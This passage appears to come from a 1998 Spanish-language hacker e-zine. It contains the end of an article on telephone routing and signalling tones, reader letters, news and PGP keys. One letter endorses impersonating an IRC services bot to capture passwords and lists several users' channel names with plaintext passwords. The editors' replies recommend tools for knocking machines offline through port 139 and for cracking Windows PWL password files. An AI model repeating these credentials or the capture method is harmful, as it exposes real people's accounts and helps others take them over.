Tu telefono se conecta a una cajita dentro de tu casa, esa cajita habia
recibido desde afuera un cable con la linea de telefono.
La linea de telefono proviene de una caja de distribucion, y esta caja de
distribucion se conecta a una interfaz del area, que puede estar a 1/2 cuadra
de la caja de distribucion o a mas, 2, 3, 4... Ahi van a parar las conecciones
de varias cajas de distribucion.
De esta interfaz de area de servicio va a la oficina central del area.
De la oficina central del area va a un centro de llamadas que la manda
a la central del area destino.
De la destino va a la interfaz destino, de esta a la caja de dist. destino
y de aca al abonado destino (Armando).
Esquematicamente llamado de Diego a Armando.

|Diego|--1---2----3------------4------------5-------6----7---8--|Armando|

1------> Caja de distribucion de Diego
2------> Interfaz del area
3------> Oficina del area de Diego
4------> Centro de llamadas
5------> Central que intermedia entre 3 y la oficina del area de Diego (**)
6------> Oficina del area de Armando
7------> Interfaz del area
8------> Caja de distribucion de Armando



* A partir del 99 los numeros de telefono en Argentina tendran un digito mas,
para el caso de Rosario, el 81-9188 pasara a ser 481-9188.
Esperemos que Menem no aumente el monopolio de la empresa de telefono.
**Esta central es segun el lugar; en algunos lugares hacen de intermediarios
entre la central y otra oficina. En otras no existe.

Ahora es tiempo de que sepan brevemente algo de como se transmite la
se¤alizacion.
Por CORRIENTE CONTINUA, el estado de la se¤al indica colgado, descolgado,
pulsos de discado o estado de la interconexion.
Se usa generalmente entre centrales analogicas.
Con TONOS, la misma palabra lo dice, se usan tonos para saber el estado o para
indicarlo.

TONO FRECUENCIA TIEMPO DE TIEMPO DE
hz ACTIVADO seg DESACTIVADO seg
Discado 350 + 440 continuo ---
Ocupado 480 + 620 0.5 0.5
Ring (normal) 440 + 480 2 4
Ring (pbx) 440 + 480 1 3
Numero inexistente 200 a 400 continuo modulado en freq con 1 hz.
Re-Call 480 + 620 0.3 0.2
Congestion (Tel. Publico) 480 + 620 0.2 0.3
Receptor Descolgado 1400 + 2060 + 0.1 0.1
2450 + 2600

Con esos tonos la central informa al origen el estado de la llamada, por
ejemplo para informar que esta ocupado la central manda combinaciones de
frecuencias (un tono) 480 y 620 hz en rafagas de 0.5 segundos separados por
intervalos de 0.5 segundos.
La de discado, es un tono continuo de frecuencias 350 y 440 hz.

En los dos tipos de se¤alizacion anteriores se envian las se¤ales de control
y de direccionamiento por el mismo circuito que las se¤ales de voz.
En la se¤alizacion de CANAL COMUN ENTRE OFICINAS las se¤ales de control son
enviadas por un circuito donde se detecta y se efectua la conmutacion y el
control de lineas independientemente de las se¤alez de voz.
Hasta aca llega el consuelo de mi locura, espero que todas las guerrillas
informaticas de America Latina hagan algo para poder decir, si, fuimos
nosotros, si, somos latinos, si, somos poderosos, a pesar que nuestros
gobiernos y los de los paises poderosos dicen que no.
N0S0TR0S S0M0S P0DER0S0S DE ALMA, N0 DE B0LSILL0$$$$$$$$


Desde Rosario, Cuna de La Bandera y del Che.//
El Emperador.//
Internet e-mail: el-emperador@mailcity.com
Fidonet Netmail: 4:904/104.11
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQGiBDVv63ARBADCimbkn1BpEAjSJzDsEVD8U14i1H+HBcWU3mTYmA3AgCvGrjXJ
q+ST6gT4LGichoe9S7iwShhw6vG6QBSCQNSxVhu7bHe77BsIRSfXbvHww+U2UK8X
o4pA7CAuHVToX7VgQxfw7NlOynqhJf/G5BGtRLuOYFMQITl3BcCquGX3hwCg/7oo
q+N7apJK5Q96xlYM2o4ep08D/2Dmghl+JDOr5lzSCgjV9tauKXMUmn2spGTbxZSN
j/VA/O2quvpzjnLMSMf2vGMJirjGa5hO91j7+rWN2CGWm0MazZ0eiMpO5fLOAATn
1Yc+VPZRD0tIrWiawSefkA37LLefcyV8DNaHgcBsB9KbneUF7MNIspWlYHLjYrKJ
h1JSA/0S4O+jp90kMQviQE9PZSeCisynp+mZ60YBgl+AQ5YqbQXsOPX6w5pPQIpC
4+bymHr2toYp6Kk2V+gwBOgYvJGw74olxoaDYJteTYZ1WhNb0mLetpWI1byuWO0T
hGZvy+hrt2ZwnR3SsO/Ogm5SHIiD4ns+DRol9UfD2gYD7fwwULQMRWwtRW1wZXJh
ZG9yiQBLBBARAgALBQI1b+twBAsDAQIACgkQCemQI95I0b5jZgCbBXe2RGRGmjYK
BlGn0sLkXLaPjYUAoOyazfM5e7Rhtn5QztQEJ/5ooXG4uQENBDVv7HQQBADmmDRZ
wYrhQXLwZIAMAiD7awuZbeuIqN5imHWkQ38ApANurj888nXekWgV7mtKSUGWj+Yv
jBLCKVGYW2DVBH1KFOES/1pYf3SJ7OM/FCK+gE0P7cajlKAbiqANKThbSC3vEf9z
GrMvU2+LwyEmm59G5b3o1jWMoPd98oHISbE64wACAgQAs1nY2BBIH/kOVZc8vdEZ
IaY4e3bu6f2aQ3zdd/sIPzDS7kre77xE82Wfx+59cxu6M0mWfVx+7tVujD2iWuFt
Set92fHKljQkEPZQlnEPFw8I+HFaEtpl2G+RYu3d4kx+YAoBFVIKe8SEcyGV+CHZ
koWefr1Jpe4Q4HKptPYKSJ2JAD8DBRg1b+x0CemQI95I0b4RArKUAKDZW3twA64R
JNnYCJeur73lhKMNsgCcCC7R2CH7Sv82p+QImpWii7gi240=
=q3+y
-----END PGP PUBLIC KEY BLOCK-----
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*/*\/*\/*\/*\/*\/*\/*\*
/ \
*|* CARTAS DEL LECTOR *|*
*|* ----------------- *|*
\ /
*\*/\*/\*/\*/\*/\*/\*/*


En el numero #11 no pudimos incluir esta seccion debido a algunos problemas
con nuestro buzon de correo, pero dado que es una de las secciones mas inte-
resantes del zine, en este numero la hemos vuelto a incluir.

____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Holaz de nuevo, en el numero #11 muestra una forma clara de conseguir
passwords de usuarios registrados en canales en el irc hispano, la
verdad que si funciona y ponganse atentos estos dias porque Scytale se
pierde entre los splits y puede que no este en un server y tu te
introduzcas en el con el nick de Scytale y los agarras. Si no es asi
cambia de server, a veces no estan todos los servers conectados y es
diferente. Ok.. See ya.

Algunos pass:
--- Ejecutarlos en un query a Scyale ---

<TOYBOY> auth #amor_sexo_lujuria TOYBOY tecno22
<Marius> auth #canarias marius pepe
<Marius> auth #tenerife marius m-jarr
<Marius> auth #cafe_canarias marius vern7337
<CopyRighT> auth #emuladores copyright copito
<Bertrand> auth #cafe_canarias Bertrand bertin
<Bertrand> auth #jazz Bertrand bertin
<Drak> auth #romanticos Drack 3527


[ Gracias de parte de RareGaZz y de todos los IRCmaniacos. Si alguno conoce
mas trucos o bugs o cualquier cosa interesante sobre el IRC que nos lo
envia, ya que hay mucha gente interesada en ello ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
primero que todo, felicito por su maravillosa revista; es de lo mejor que he
encontrado en la red y en espanol !
les hablo desde colombia, mas especificamente desde cali me gustaria si
pueden que me digan lo que saben sobre mi pais y la gente de el que se ha
comunicado con ustedes.
quisiera pedirles que alguien se escriba por ahi un "aprendiendo lenguaje C
mientras paseas por el supermercado" y si no es mucho pedir tambien algo de
lenguaje asm. nada complejo algo que entendamos todos y nos sirva como base.


[ Agradecemos que te guste nuestra revista y esperamos que sigas leyendo
todos nuestros numeros. En cuanto a los cursos de C y ASM los hay a
montones. Solo has de buscarlos bien. Prueba en los buscadores. Los
cursos de ASM es muy frecuente encontrarlos en las paginas de virii. Has
mirado en http://29a.islatortuga.com? ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Esste mail es spara comentarles que su último número de Raregazzffue un
verdadero asco ya que le falto algo, como que lo españoles no tienen el
mismo toque que los mexicanos, en serio h se sasltaron la sección donde
informan de lo último.

Espero que la revista mejore cada día más y más.


[ Bueno, en primer lugar, a ver si aprendes a escribir, porque no se te
entiende nada. Y en segundo lugar, solo te dire que respeto que no te
guste la revista. No pretendemos que le guste a todo el mundo. Pero NO
tienes ningun derecho a decir que es un asco porque la ha editado un
espa¤ol. Resulta que la mayoria de articulos los ha enviado gente de
sudamerica. Y ya que eres tan critico, porque no mandas tu algun articulo
para 'ense¤arnos'?

PD: porque enviaste el mail como anonimo? acaso tienes miedo? }:-> ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Que tal, muchachos!
Su revista esta muy buena. Me encanta. Los mailelo desde argentina.
Sus notas y su ideologia son excelentes (EL CHE VIVIRA POR SIEMPRE EN
NUESTROS CORAZONES REVOLUCIONARIOS)!!!
Les queria hacer 2 preguntas:
1) Como hago para sacar la direccion IP de alguien de un email?

2) Como hago para, con el mirc, en un chat, mandar unb paquete de info a
alguien al port 139?


[ La direccion IP viene en la cabecera del mail. Si usas el Netscape o
cualquier otro programa de correo podras seleccionar que te muestre la
cabecera completa y obtendras algo parecido a esto:
Received:
from ctv1234.ctv.es (195.54.122.254) by
host096.a-272.99.66.209.in-addr.arpa with SMTP; 26 May 1998
23:38:00 -0000

bla bla bla

Pues el 195.54.122.254 es su IP.

Y en cuanto a tu segunda pregunta, puedes buscar nukeadores en
astalavista o en cualquier pagina hacker. Los hay a patadas ... incluso
en la nuestra :P ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Actualicen pronto la Pagina de MP3'S o al menos den enlaaces a los ya
existentes.......111111!!!1111.
Please........!!!!!!!1


[ Lo siento, pero eso lo llevaba RareTrip. Si alguien conoce links o
sites donde encontrarlos que nos avise para poder incluirlos en la web ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
para no hechar carreta les voy a preguntar de una:
POR FAVOOOOORRRR he encontrado un mundo de armas en formato .c como las
uso o que programa uso, por favooor son mi ultima esperanza
como ejecuto los malditos archivos .c


[ Bien, me imagino que hablaras de linux, porque los fuentes en C que
aparecen por Internet no son para MS-DOS ni para Windows. Pues debes
compilarlos usando gcc de la siguiente manera:
gcc programa.c -o programa
Y si esto no te da errores podras ejecuarlo escribiendo: programa
Pero te recomiendo que aprendas C y no te limites a compilar y usar el
trabajo de otros ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
necesito un buen visor de pwls.. el glide y el pwlcrack, no funcionan con
versiones de win95b verison 4.00 en adelante no se puede ver los pwls....
algun visor mejorcito???? ya tenia mi cuenta en el usanel ,pero no me
llegaban actualizaciones de la revista. espero que en este email si....
bueno es all por el momento. espero reply pornto.... adios...


[ En efecto, el glide solo funciona con versiones antiguas de Windows, no
con la OEM. Quiero recalcar que el glide funciona 'perfectamente' pero
con las versiones anteriores a la OEM de win95. Lo digo porque mucha
gente ha escrito diciendo que el glide no funciona o que solo va cuando
quiere. Para la version OEM el pwlcrack va muy bien, pero tiene el
inconveniente de que debes ejecutarlo en el mismo ordenador, o tambien
puedes crearte en tu ordenador un usuario con ese nombrey luego sustituir
el PWL, pero tiene el inconveniente de que si el due¤o le puso password,
no podras entrar. Para eso existen programas como el PWLOSR! o el PWLTOOLS
que podras encontrarlos en nuestra pagina. Sirven para averiguar el pass
usando diccionarios de palabras, pero te aviso que no funcionan demasiado
bien :( ]
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=-_-=-_-=-_-=-_-=
| |
| NOTICIAS |
| -------- |
| _ _ _ _ |
=- -=- -=- -=- -=

____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
En primer lugar queriamos pedir disculpas a Lobo por olvidar incluir su
nick en el articulo que nos envio, y que aparecio, en el anterior numero
de nuestro zine. Para los que os bajasteis la revista mas tarde ya estaba
modificada. Se trata del articulo sobre 'Trucos para el IRC hispano'.
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cada vez el nivel de hacking en paises de habla hispana es mas elevado,
pero aun asi debemos mantener un gran respeto por algunos zines de otros
paises. Ya se han realizado traducciones de algunos de ellos, como es el
caso del Happy Hacker, pero creo que seria muy interesante crear una nueva
seccion en la que incluyamos los numeros traducidos de uno de los mejores y
mas antiguos zines de internet: Phreak. Pero para ello hace falta vuestra
colaboracion. Si quereis que creemos esta seccion debeis ayudarnos con las
traducciones. Para ello escribir a raregazz@iname.com indicando en el
subject: 'traduccion phreak' y en el mensaje nos poneis vuestro mail y el
numero que quereis traducir. Para realizar traducciones es mejor que nos
lo aviseis primero no vaya a ser que se traduzca un texto mas de una vez.
____________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mucha gente nos ha escrito preguntandonos si conociamos algun hacker de su
ciudad o pais, asi que he decidido crear una nueva seccion de 'contactos'.
A partir de ahora podeis contactar con otros hackers a traves de RareGaZz.
Solo teneis que enviarnos un mail que contenga lo siguiente:
Subject: contactos
Mensaje: mail : vuestraDireccion@de.mail
ciudad : vuestra ciudad
pais : vuestro pais
con quien : con que ciudades o paises quereis contactar

Un ejemplo seria:
mail : perico@arrakis.es
ciudad : Almeria
pais : Espa¤a
con quien : con cualquier persona de Andalucia (o de Almeria, o lo
que querais poner)

Y si nosotros tenemos mas personas de Andalucia que quieran contactar con
gente de su region, avisaremos a ambos enviandoles a cada uno la direccion
de mail del contrario.

`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'

$$$$$$$$$$$$$$$$$
$$ $$
$$ DESPEDIDA $$
$$ ~~~~~~~~~ $$
$$$$$$$$$$$$$$$$$


Una vez mas nos despedimos todos vosotros. Esto es buena se¤as, porque quiere
decir que lo hemos vualto a conseguir. De nuevo RareGaZz saca otro numero. Y
gracias a vuestra colaboracion y apoyo, ya llevamos 12.

Seguir enviandonos articulos y sugerencias para que pronto podamos poner a
vuestra disposicion un nuevo numero.

Un saludo a todos de parte de todos los componentes de RareGaZz.

Aqui teneis la nueva llave PGP de RareGaZz:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.0

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
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----


Y para los que usais la versin 2.6.3 en vez de la 5, podeis enviar vuestros
mails usando esta otra:

Type Bits/KeyID Date

  
User ID
pub 2048/DF9FDDF1 1997/09/06 GuyBrush

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQENAzQRC6EAAAEIANn1u+zQmbcctlaQzpkDUtWWWgbV77IS/AcKbxcRDpV0gEO+
kosiVsRsNVVGW49G0N9QvJBRydpS5icuWUs5ZRZX8AZmV09JGVfIKODAZ+Ns8Lk4
U/fxxfOhTNDX5cOZzEI02fpSeoUfHaVi6Te115isTMlXD+X46cS1AnNYQePB//xf
GhxriqVq3mkqb1S9gXa/4bc9IxkFiA+shzUUxXFZP/M92m0q8M16TPeoVFuxhtZ3
A2Gzkvd2UQbNRDo78W6QqG9cn+q/UqhEggEqK/vwGVAvlY/h5Gr3mRHX3XxM8Ey6
bH0gHmgokxAQBWXtxGYLLp1BhN/pzn2ekN+f3fEABRG0CEd1eUJydXNoiQEVAwUQ
NDwPq859npDfn93xAQE2Dgf+OhHFL4G5oh5AyN1irHNReeMsy51wbSwSDVYUWv7N
4f+t0opvch+FhOY1aRMkvm/+eeMW4/OrotH1uUHMJYkH8MoOM0+9BuwNVGwe0jUg
hPz9cZtPwSaslpqDIagG3LSb246Jb+H0HWWZh6Gc3AiFGbJr9QcNcQ7uRZwf7MEC
BdlH1v0WZxhfH0vrmWAwbC9dbIIfVOmvTY7YfQNpjtZ3fcRrFLf7rMvn/H5HEEEJ
6uwFF5QIBmemb1ptcZ+8C96kDMWNig9j/GuVTF4HA/2YZYHjKa4ljCx2GYPXp2PU
dl5Ce4UHDdbb051vf3D1ORwBjj86OgIUVtY3MFsfk9pjEg==
=hMoY
-----END PGP PUBLIC KEY BLOCK-----


RareGaZz '98
~~~~~~~~~~~~

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT